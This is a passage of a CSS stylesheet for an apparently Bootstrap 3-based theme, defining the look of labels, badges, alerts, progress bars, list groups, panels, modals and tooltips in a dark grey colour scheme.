  font-size: 75%;
  font-weight: bold;
  line-height: 1;
  color: #ffffff;
  text-align: center;
  white-space: nowrap;
  vertical-align: baseline;
  border-radius: .25em;
}
a.label:hover,
a.label:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.label:empty {
  display: none;
}
.btn .label {
  position: relative;
  top: -1px;
}
.label-default {
  background-color: #999999;
}
.label-default[href]:hover,
.label-default[href]:focus {
  background-color: #808080;
}
.label-primary {
  background-color: #454444;
}
.label-primary[href]:hover,
.label-primary[href]:focus {
  background-color: #2b2b2b;
}
.label-success {
  background-color: #3e9b52;
}
.label-success[href]:hover,
.label-success[href]:focus {
  background-color: #2f773f;
}
.label-info {
  background-color: #0099cc;
}
.label-info[href]:hover,
.label-info[href]:focus {
  background-color: #007399;
}
.label-warning {
  background-color: #ff8800;
}
.label-warning[href]:hover,
.label-warning[href]:focus {
  background-color: #cc6d00;
}
.label-danger {
  background-color: #cc0000;
}
.label-danger[href]:hover,
.label-danger[href]:focus {
  background-color: #990000;
}
.badge {
  display: inline-block;
  min-width: 10px;
  padding: 3px 7px;
  font-size: 12px;
  font-weight: bold;
  color: #ffffff;
  line-height: 1;
  vertical-align: baseline;
  white-space: nowrap;
  text-align: center;
  background-color: #999999;
  border-radius: 0px;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.btn-xs .badge,
.btn-group-xs > .btn .badge {
  top: 0;
  padding: 1px 5px;
}
a.badge:hover,
a.badge:focus {
  color: #ffffff;
  text-decoration: none;
  cursor: pointer;
}
.list-group-item.active > .badge,
.nav-pills > .active > a > .badge {
  color: #454444;
  background-color: #ffffff;
}
.list-group-item > .badge {
  float: right;
}
.list-group-item > .badge + .badge {
  margin-right: 5px;
}
.nav-pills > li > a > .badge {
  margin-left: 3px;
}
.jumbotron {
  padding: 40px 20px;
  margin-bottom: 40px;
  color: inherit;
  background-color: #eeeeee;
}
.jumbotron h1,
.jumbotron .h1 {
  color: inherit;
}
.jumbotron p {
  margin-bottom: 20px;
  font-size: 21px;
  font-weight: 200;
}
.jumbotron > hr {
  border-top-color: #d5d5d5;
}
.container .jumbotron,
.container-fluid .jumbotron {
  border-radius: 0px;
}
.jumbotron .container {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .jumbotron {
    padding: 64px 0;
  }
  .container .jumbotron,
  .container-fluid .jumbotron {
    padding-left: 80px;
    padding-right: 80px;
  }
  .jumbotron h1,
  .jumbotron .h1 {
    font-size: 63px;
  }
}
.thumbnail {
  display: block;
  padding: 4px;
  margin-bottom: 20px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
  -webkit-transition: border 0.2s ease-in-out;
  -o-transition: border 0.2s ease-in-out;
  transition: border 0.2s ease-in-out;
}
.thumbnail > img,
.thumbnail a > img {
  margin-left: auto;
  margin-right: auto;
}
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
  border-color: #454444;
}
.thumbnail .caption {
  padding: 10px;
  color: #444444;
}
.alert {
  padding: 15px;
  margin-bottom: 20px;
  border: 1px solid transparent;
  border-radius: 0px;
}
.alert h4 {
  margin-top: 0;
  color: inherit;
}
.alert .alert-link {
  font-weight: bold;
}
.alert > p,
.alert > ul {
  margin-bottom: 0;
}
.alert > p + p {
  margin-top: 5px;
}
.alert-dismissable,
.alert-dismissible {
  padding-right: 35px;
}
.alert-dismissable .close,
.alert-dismissible .close {
  position: relative;
  top: -2px;
  right: -21px;
  color: inherit;
}
.alert-success {
  background-color: #dff0d8;
  border-color: #d6e9c6;
  color: #468847;
}
.alert-success hr {
  border-top-color: #c9e2b3;
}
.alert-success .alert-link {
  color: #356635;
}
.alert-info {
  background-color: #d9edf7;
  border-color: #bce8f1;
  color: #3a87ad;
}
.alert-info hr {
  border-top-color: #a6e1ec;
}
.alert-info .alert-link {
  color: #2d6987;
}
.alert-warning {
  background-color: #fcf8e3;
  border-color: #faebcc;
  color: #c09853;
}
.alert-warning hr {
  border-top-color: #f7e1b5;
}
.alert-warning .alert-link {
  color: #a47e3c;
}
.alert-danger {
  background-color: #f2dede;
  border-color: #ebccd1;
  color: #b94a48;
}
.alert-danger hr {
  border-top-color: #e4b9c0;
}
.alert-danger .alert-link {
  color: #953b39;
}
@-webkit-keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
@keyframes progress-bar-stripes {
  from {
    background-position: 40px 0;
  }
  to {
    background-position: 0 0;
  }
}
.progress {
  overflow: hidden;
  height: 20px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1);
}
.progress-bar {
  float: left;
  width: 0%;
  height: 100%;
  font-size: 12px;
  line-height: 20px;
  color: #ffffff;
  text-align: center;
  background-color: #454444;
  -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15);
  -webkit-transition: width 0.6s ease;
  -o-transition: width 0.6s ease;
  transition: width 0.6s ease;
}
.progress-striped .progress-bar,
.progress-bar-striped {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-size: 40px 40px;
}
.progress.active .progress-bar,
.progress-bar.active {
  -webkit-animation: progress-bar-stripes 2s linear infinite;
  -o-animation: progress-bar-stripes 2s linear infinite;
  animation: progress-bar-stripes 2s linear infinite;
}
.progress-bar-success {
  background-color: #3e9b52;
}
.progress-striped .progress-bar-success {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-info {
  background-color: #0099cc;
}
.progress-striped .progress-bar-info {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-warning {
  background-color: #ff8800;
}
.progress-striped .progress-bar-warning {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.progress-bar-danger {
  background-color: #cc0000;
}
.progress-striped .progress-bar-danger {
  background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: -o-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
  background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
}
.media {
  margin-top: 15px;
}
.media:first-child {
  margin-top: 0;
}
.media,
.media-body {
  zoom: 1;
  overflow: hidden;
}
.media-body {
  width: 10000px;
}
.media-object {
  display: block;
}
.media-right,
.media > .pull-right {
  padding-left: 10px;
}
.media-left,
.media > .pull-left {
  padding-right: 10px;
}
.media-left,
.media-right,
.media-body {
  display: table-cell;
  vertical-align: top;
}
.media-middle {
  vertical-align: middle;
}
.media-bottom {
  vertical-align: bottom;
}
.media-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.media-list {
  padding-left: 0;
  list-style: none;
}
.list-group {
  margin-bottom: 20px;
  padding-left: 0;
}
.list-group-item {
  position: relative;
  display: block;
  padding: 10px 15px;
  margin-bottom: -1px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
}
.list-group-item:first-child {
  border-top-right-radius: 0px;
  border-top-left-radius: 0px;
}
.list-group-item:last-child {
  margin-bottom: 0;
  border-bottom-right-radius: 0px;
  border-bottom-left-radius: 0px;
}
a.list-group-item {
  color: #555555;
}
a.list-group-item .list-group-item-heading {
  color: #333333;
}
a.list-group-item:hover,
a.list-group-item:focus {
  text-decoration: none;
  color: #555555;
  background-color: #f5f5f5;
}
.list-group-item.disabled,
.list-group-item.disabled:hover,
.list-group-item.disabled:focus {
  background-color: #eeeeee;
  color: #999999;
  cursor: not-allowed;
}
.list-group-item.disabled .list-group-item-heading,
.list-group-item.disabled:hover .list-group-item-heading,
.list-group-item.disabled:focus .list-group-item-heading {
  color: inherit;
}
.list-group-item.disabled .list-group-item-text,
.list-group-item.disabled:hover .list-group-item-text,
.list-group-item.disabled:focus .list-group-item-text {
  color: #999999;
}
.list-group-item.active,
.list-group-item.active:hover,
.list-group-item.active:focus {
  z-index: 2;
  color: #ffffff;
  background-color: #454444;
  border-color: #454444;
}
.list-group-item.active .list-group-item-heading,
.list-group-item.active:hover .list-group-item-heading,
.list-group-item.active:focus .list-group-item-heading,
.list-group-item.active .list-group-item-heading > small,
.list-group-item.active:hover .list-group-item-heading > small,
.list-group-item.active:focus .list-group-item-heading > small,
.list-group-item.active .list-group-item-heading > .small,
.list-group-item.active:hover .list-group-item-heading > .small,
.list-group-item.active:focus .list-group-item-heading > .small {
  color: inherit;
}
.list-group-item.active .list-group-item-text,
.list-group-item.active:hover .list-group-item-text,
.list-group-item.active:focus .list-group-item-text {
  color: #abaaaa;
}
.list-group-item-success {
  color: #468847;
  background-color: #dff0d8;
}
a.list-group-item-success {
  color: #468847;
}
a.list-group-item-success .list-group-item-heading {
  color: inherit;
}
a.list-group-item-success:hover,
a.list-group-item-success:focus {
  color: #468847;
  background-color: #d0e9c6;
}
a.list-group-item-success.active,
a.list-group-item-success.active:hover,
a.list-group-item-success.active:focus {
  color: #fff;
  background-color: #468847;
  border-color: #468847;
}
.list-group-item-info {
  color: #3a87ad;
  background-color: #d9edf7;
}
a.list-group-item-info {
  color: #3a87ad;
}
a.list-group-item-info .list-group-item-heading {
  color: inherit;
}
a.list-group-item-info:hover,
a.list-group-item-info:focus {
  color: #3a87ad;
  background-color: #c4e3f3;
}
a.list-group-item-info.active,
a.list-group-item-info.active:hover,
a.list-group-item-info.active:focus {
  color: #fff;
  background-color: #3a87ad;
  border-color: #3a87ad;
}
.list-group-item-warning {
  color: #c09853;
  background-color: #fcf8e3;
}
a.list-group-item-warning {
  color: #c09853;
}
a.list-group-item-warning .list-group-item-heading {
  color: inherit;
}
a.list-group-item-warning:hover,
a.list-group-item-warning:focus {
  color: #c09853;
  background-color: #faf2cc;
}
a.list-group-item-warning.active,
a.list-group-item-warning.active:hover,
a.list-group-item-warning.active:focus {
  color: #fff;
  background-color: #c09853;
  border-color: #c09853;
}
.list-group-item-danger {
  color: #b94a48;
  background-color: #f2dede;
}
a.list-group-item-danger {
  color: #b94a48;
}
a.list-group-item-danger .list-group-item-heading {
  color: inherit;
}
a.list-group-item-danger:hover,
a.list-group-item-danger:focus {
  color: #b94a48;
  background-color: #ebcccc;
}
a.list-group-item-danger.active,
a.list-group-item-danger.active:hover,
a.list-group-item-danger.active:focus {
  color: #fff;
  background-color: #b94a48;
  border-color: #b94a48;
}
.list-group-item-heading {
  margin-top: 0;
  margin-bottom: 5px;
}
.list-group-item-text {
  margin-bottom: 0;
  line-height: 1.3;
}
.panel {
  margin-bottom: 20px;
  background-color: #ffffff;
  border: 1px solid transparent;
  border-radius: 0px;
  -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05);
}
.panel-body {
  padding: 15px;
}
.panel-heading {
  padding: 10px 15px;
  border-bottom: 1px solid transparent;
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title {
  margin-top: 0;
  margin-bottom: 0;
  font-size: 16px;
  color: inherit;
}
.panel-title > a,
.panel-title > small,
.panel-title > .small,
.panel-title > small > a,
.panel-title > .small > a {
  color: inherit;
}
.panel-footer {
  padding: 10px 15px;
  background-color: #f5f5f5;
  border-top: 1px solid #dddddd;
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel > .list-group,
.panel > .panel-collapse > .list-group {
  margin-bottom: 0;
}
.panel > .list-group .list-group-item,
.panel > .panel-collapse > .list-group .list-group-item {
  border-width: 1px 0;
  border-radius: 0;
}
.panel > .list-group:first-child .list-group-item:first-child,
.panel > .panel-collapse > .list-group:first-child .list-group-item:first-child {
  border-top: 0;
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel > .list-group:last-child .list-group-item:last-child,
.panel > .panel-collapse > .list-group:last-child .list-group-item:last-child {
  border-bottom: 0;
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel-heading + .list-group .list-group-item:first-child {
  border-top-width: 0;
}
.list-group + .panel-footer {
  border-top-width: 0;
}
.panel > .table,
.panel > .table-responsive > .table,
.panel > .panel-collapse > .table {
  margin-bottom: 0;
}
.panel > .table caption,
.panel > .table-responsive > .table caption,
.panel > .panel-collapse > .table caption {
  padding-left: 15px;
  padding-right: 15px;
}
.panel > .table:first-child,
.panel > .table-responsive:first-child > .table:first-child {
  border-top-right-radius: -1px;
  border-top-left-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child {
  border-top-left-radius: -1px;
  border-top-right-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:first-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child {
  border-top-left-radius: -1px;
}
.panel > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child,
.panel > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child,
.panel > .table:first-child > tbody:first-child > tr:first-child th:last-child,
.panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child {
  border-top-right-radius: -1px;
}
.panel > .table:last-child,
.panel > .table-responsive:last-child > .table:last-child {
  border-bottom-right-radius: -1px;
  border-bottom-left-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child {
  border-bottom-left-radius: -1px;
  border-bottom-right-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child {
  border-bottom-left-radius: -1px;
}
.panel > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child,
.panel > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child,
.panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child,
.panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child {
  border-bottom-right-radius: -1px;
}
.panel > .panel-body + .table,
.panel > .panel-body + .table-responsive,
.panel > .table + .panel-body,
.panel > .table-responsive + .panel-body {
  border-top: 1px solid #dddddd;
}
.panel > .table > tbody:first-child > tr:first-child th,
.panel > .table > tbody:first-child > tr:first-child td {
  border-top: 0;
}
.panel > .table-bordered,
.panel > .table-responsive > .table-bordered {
  border: 0;
}
.panel > .table-bordered > thead > tr > th:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:first-child,
.panel > .table-bordered > tbody > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:first-child,
.panel > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:first-child,
.panel > .table-bordered > thead > tr > td:first-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:first-child,
.panel > .table-bordered > tbody > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:first-child,
.panel > .table-bordered > tfoot > tr > td:first-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:first-child {
  border-left: 0;
}
.panel > .table-bordered > thead > tr > th:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > th:last-child,
.panel > .table-bordered > tbody > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > th:last-child,
.panel > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > th:last-child,
.panel > .table-bordered > thead > tr > td:last-child,
.panel > .table-responsive > .table-bordered > thead > tr > td:last-child,
.panel > .table-bordered > tbody > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tbody > tr > td:last-child,
.panel > .table-bordered > tfoot > tr > td:last-child,
.panel > .table-responsive > .table-bordered > tfoot > tr > td:last-child {
  border-right: 0;
}
.panel > .table-bordered > thead > tr:first-child > td,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > td,
.panel > .table-bordered > tbody > tr:first-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > td,
.panel > .table-bordered > thead > tr:first-child > th,
.panel > .table-responsive > .table-bordered > thead > tr:first-child > th,
.panel > .table-bordered > tbody > tr:first-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:first-child > th {
  border-bottom: 0;
}
.panel > .table-bordered > tbody > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > td,
.panel > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > td,
.panel > .table-bordered > tbody > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tbody > tr:last-child > th,
.panel > .table-bordered > tfoot > tr:last-child > th,
.panel > .table-responsive > .table-bordered > tfoot > tr:last-child > th {
  border-bottom: 0;
}
.panel > .table-responsive {
  border: 0;
  margin-bottom: 0;
}
.panel-group {
  margin-bottom: 20px;
}
.panel-group .panel {
  margin-bottom: 0;
  border-radius: 0px;
}
.panel-group .panel + .panel {
  margin-top: 5px;
}
.panel-group .panel-heading {
  border-bottom: 0;
}
.panel-group .panel-heading + .panel-collapse > .panel-body,
.panel-group .panel-heading + .panel-collapse > .list-group {
  border-top: 1px solid #dddddd;
}
.panel-group .panel-footer {
  border-top: 0;
}
.panel-group .panel-footer + .panel-collapse .panel-body {
  border-bottom: 1px solid #dddddd;
}
.panel-default {
  border-color: #dddddd;
}
.panel-default > .panel-heading {
  color: #444444;
  background-color: #f5f5f5;
  border-color: #dddddd;
}
.panel-default > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #dddddd;
}
.panel-default > .panel-heading .badge {
  color: #f5f5f5;
  background-color: #444444;
}
.panel-default > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #dddddd;
}
.panel-primary {
  border-color: #454444;
}
.panel-primary > .panel-heading {
  color: #ffffff;
  background-color: #454444;
  border-color: #454444;
}
.panel-primary > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #454444;
}
.panel-primary > .panel-heading .badge {
  color: #454444;
  background-color: #ffffff;
}
.panel-primary > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #454444;
}
.panel-success {
  border-color: #d6e9c6;
}
.panel-success > .panel-heading {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.panel-success > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0px;
}
.well-sm {
  padding: 9px;
  border-radius: 0px;
}
.close {
  float: right;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  opacity: 0.2;
  filter: alpha(opacity=20);
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  opacity: 0.5;
  filter: alpha(opacity=50);
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  display: none;
  overflow: hidden;
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1050;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0px;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  background-clip: padding-box;
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  opacity: 0;
  filter: alpha(opacity=0);
}
.modal-backdrop.in {
  opacity: 0.5;
  filter: alpha(opacity=50);
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
  min-height: 21.42857143px;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: right;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-left: 5px;
  margin-bottom: 0;
}
.modal-footer .btn-group .btn + .btn {
  margin-left: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-left: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 12px;
  font-weight: normal;
  line-height: 1.4;
  opacity: 0;
  filter: alpha(opacity=0);
}
.tooltip.in {
  opacity: 0.9;
  filter: alpha(opacity=90);
}
.tooltip.top {
  margin-top: -3px;
  padding: 5px 0;
}
.tooltip.right {
  margin-left: 3px;
  padding: 0 5px;
}
.tooltip.bottom {
  margin-top: 3px;
  padding: 5px 0;
}
.tooltip.left {
  margin-left: -3px;
  padding: 0 5px;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  text-decoration: none;
  background-color: #000000;
  border-radius: 0px;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  bottom: 0;
  right: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  left: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  left: 50%;
  margin-left: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
